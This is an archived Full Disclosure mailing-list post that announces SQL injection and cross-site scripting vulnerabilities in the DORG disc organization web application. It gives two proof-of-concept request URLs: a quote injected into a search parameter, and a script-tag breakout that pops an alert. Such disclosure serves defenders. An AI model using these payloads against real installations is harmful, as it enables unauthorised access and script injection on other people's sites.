| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <15394043c1b.dfd43a6d105993.2398635986428028931@secupent.com>
Date: Sun, 20 Mar 2016 18:33:38 +0600
From: SECUPENT Research Center <research@...upent.com>
To: <submit@...sec.com>, <admin@...loit-db.com>, <exploit4arab@...il.com>,
<vuldb@...urityfocus.com>, <moderators@...db.org>,
<submit@...ec.org>, <submissions@...ketstormsecurity.com>,
<fulldisclosure@...lists.org>, <submit@...7day.com>,
<mr.inj3ct0r@...il.com>, <cve@...re.org>
Subject: [FD] DORG - Disc Organization System SQL Injection And Cross Site
Scripting
Exploit Title: DORG - Disc Organization System SQL Injection And Cross Site Scripting
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016
SQL Injection:
link: http://localhost/dorg/results.php?q=3&search=%2527&type=3
Screenshot: http://secupent.com/exploit/images/drogsql.jpg
Cross Site Scripting (XSS):
link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3
Screenshot: http://secupent.com/exploit/images/drogxss.jpg
View attachment "drog.txt" of type "text/plain" (644 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists